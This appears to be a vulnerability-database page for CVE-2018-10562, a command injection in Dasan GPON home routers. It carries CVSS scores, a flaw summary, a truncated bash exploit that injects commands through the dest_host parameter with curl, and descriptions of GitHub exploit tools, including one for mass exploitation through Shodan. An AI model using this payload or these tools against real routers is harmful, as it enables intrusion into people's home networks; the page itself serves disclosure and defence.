758
VMScore

CVE-2018-10562

Published: 04/05/2018 Updated: 03/10/2019
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 758
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

An issue exists on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

dasannetworks gpon_router_firmware -

Exploits

#!/bin/bash echo "[+] Sending the Command… " # We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo "[+] Waiti ...

Github Repositories

Exploit for CVE-2018-10562

CVE-2018-10562 CVE-2018-10562 exploit About RCE on GPON home routers [*]CVE-2018-10561:Authentication Bypass [*]CVE-2018-10562: Command Injection Dependencies required requests urllib2 ssl re Screenshots

RCE on GPON home routers (CVE-2018-10561) Press The Hacker News - 1 The Hacker News - 2 KitPloit Security Affairs Vulnerability Many routers today use GPON internet, and a way to bypass all authentication on the devices (CVE-2018-10561) was found by VPNMentor With this authentication bypass, it's also possible to unveil another command injection vulnerability (CVE-2018-1

Exploit for Mass Remote Code Execution on GPON home routers (CVE-2018-10562) obtained from Shodan.

PINGPON EXPLOIT Author: @037 Pingpon is a tool used to obtain thousands of vulnerable GPON home routers using Shodanio to then execute any Linux command on using a remote code execution flaw (CVE-2018-10562) DISCLAIMER I am NOT responsible for any damages caused or any crimes committed by using this tool Original Script: githubcom/f3d0x0/GPON Prerequisites You're req

Exploit for Remote Code Execution on GPON home routers (CVE-2018-10562) written in Python.

GPON_RCE Exploit for Remote Code Execution on GPON home routers (CVE-2018-10562) written in Python

Exploit for Remote Code Execution on GPON home routers (CVE-2018-10562) written in Python. Initially disclosed by VPNMentor (https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/), kudos for their work.

RCE on GPON home routers (CVE-2018-10561) Press The Hacker News - 1 The Hacker News - 2 KitPloit Security Affairs Vulnerability Many routers today use GPON internet, and a way to bypass all authentication on the devices (CVE-2018-10561) was found by VPNMentor With this authentication bypass, it's also possible to unveil another command injection vulnerability (CVE-2018-1

RCE on GPON home routers (CVE-2018-10561) Press The Hacker News - 1 The Hacker News - 2 KitPloit Security Affairs Vulnerability Many routers today use GPON internet, and a way to bypass all authentication on the devices (CVE-2018-10561) was found by VPNMentor With this authentication bypass, it's also possible to unveil another command injection vulnerability (CVE-2018-1

RCE on GPON home routers (CVE-2018-10561) Press The Hacker News - 1 The Hacker News - 2 KitPloit Security Affairs Vulnerability Many routers today use GPON internet, and a way to bypass all authentication on the devices (CVE-2018-10561) was found by VPNMentor With this authentication bypass, it's also possible to unveil another command injection vulnerability (CVE-2018-1

These are the IP addresses of the most active C2/Botnets/Zombies/Scanners in European Cyber Space

Malicious IP Addresses These are the IP addresses of the most active Botnets/Zombies/Scanners in European Cyber Space All lists available blacklist_ips_for_fortinet_firewall_aatxt blacklist_ips_for_fortinet_firewall_abtxt botnets_zombies_scanner_spam_ipstxt (full list) botnets_zombies_scanner_spam_ips_ipv6txt (soon !!!) Categories SSH Brute Forcers FortiOS CVE | RCE Exploi

Exploit loader for Remote Code Execution w/ Payload on GPON Home Gateway devices (CVE-2018-10562) written in Python.

GPON-LOADER Exploit loader for Remote Code Execution w/ Payload on GPON Home Gateway devices (CVE-2018-10562) written in Python Dependencies requests Usage python gpon-loaderpy <listtxt>